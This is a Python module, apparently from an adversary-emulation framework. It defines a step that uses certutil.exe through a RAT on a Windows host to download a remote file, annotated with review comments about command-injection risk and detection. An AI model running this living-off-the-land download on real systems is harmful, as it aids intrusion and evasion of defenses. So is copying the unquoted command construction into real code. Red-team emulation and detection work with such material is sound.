from plugins.adversary.app.operation.operation import Step, OPSoftware, OPRat, OPVar, OPHost, OPFile
from plugins.adversary.app.commands import *
from plugins.adversary.app.custom import *
class CertutilDownload(Step):
    """ Description:
    This step downloads a file from a remote web server to the host using certutil.
    Based on https://twitter.com/subTee/status/888102593838362624
    Requirements:
    This step only requires the existence of a RAT on a host in order to run.

    Step contract, as declared by the class attributes below:
        preconditions:  a RAT, the host that RAT runs on, and a software fact
                        whose ``downloaded`` flag is still False.
        postconditions: a new file fact (``file_g``) and the same software fact
                        with ``downloaded`` set to True (``software_g``).
    """
    display_name = 'certutil_download'
    summary = 'Use certutil.exe to download a file from a remote server'
    # ATT&CK technique / tactic pair this step is reported under.
    attack_mapping = [('T1140', 'Defense Evasion')]
    preconditions = [('rat', OPRat),
                     ('host', OPHost(OPVar('rat.host'))),
                     ('software', OPSoftware({'downloaded': False}))]
    postconditions = [('file_g', OPFile),
                      ('software_g', OPSoftware({'downloaded': True}))]
    # Properties of the postcondition facts that action() fills in.
    postproperties = ['file_g.path']
    # NOTE(review): presumably the parameters that make one run of this step
    # distinct from another for the planner — confirm against Step.
    significant_parameters = ['host']

    @staticmethod
    def description(host, software) -> str:
        """Return the human-readable label shown for this step instance."""
        return 'Downloading {} via Certutil on {}'.format(software.name, host.fqdn)

    @staticmethod
    def parser(text: str) -> bool:
        """Judge the captured console output of the download command.

        The only success signal used is the substring 'completed successfully';
        any other output (or empty output) is treated as failure.
        """
        # NOTE(review): `re` is not imported explicitly in this file; it must
        # arrive through one of the star imports above — confirm, or import it.
        return (re.search('completed successfully', text) is not None)

    @staticmethod
    async def action(operation, rat, host, software, file_g, software_g):
        """Fetch software.download_url on the host and record the resulting file.

        Args:
            operation: the running operation; used to execute the shell command.
            rat: the RAT the command is executed through.
            host: the host the RAT lives on; recorded on the new file fact.
            software: software fact carrying ``download_url`` and ``download_loc``.
            file_g: postcondition callable that records the downloaded file fact.
            software_g: postcondition callable that records the updated software fact.

        Returns:
            Whatever operation.execute_shell_command returns — presumably the
            verdict of CertutilDownload.parser, i.e. True only when the output
            contained 'completed successfully'.
        """
        # NOTE(review): get_process comes from a star import; it presumably
        # reduces the URL to the bare file name that certutil writes — verify.
        filename = get_process(software.download_url)
        # certutil fetches the URL into the current directory, then `move`
        # relocates the file to the requested location. download_url and
        # download_loc are interpolated unquoted: a value containing spaces or
        # cmd.exe metacharacters (&, |, ", ...) changes what cmd.exe executes,
        # so these fields must be trusted, well-formed operator input.
        # NOTE(review): certutil.exe with `-urlcache -split -f` launched from
        # cmd.exe is a widely documented living-off-the-land download pattern;
        # expect it to surface in process-creation telemetry on a monitored host.
        commands = 'c:\\windows\\system32\\certutil.exe -urlcache -split -f {} && move {} {}'.format(software.download_url, filename, software.download_loc)
        # The whole chain is passed to cmd.exe as a single double-quoted
        # argument; the captured output is judged by CertutilDownload.parser.
        successful = (await operation.execute_shell_command(rat, command.CommandLine(['cmd', '/c', '"{}"'.format(commands)]), CertutilDownload.parser))
        # The file fact and the downloaded flag are recorded even when the
        # command was judged unsuccessful — presumably so that cleanup() still
        # removes a partially written artifact; confirm this is intended, since
        # it also marks the software as downloaded after a failed fetch.
        await file_g({'path': software.download_loc, 'host': host })
        software.downloaded = True
        await update_software(software_g, software)
        return successful

    @staticmethod
    async def cleanup(cleaner, file_g):
        """Delete every file fact this step recorded, via the operation's cleaner."""
        # `file` shadows the builtin name; harmless here but worth renaming.
        for file in file_g:
            await cleaner.delete(file)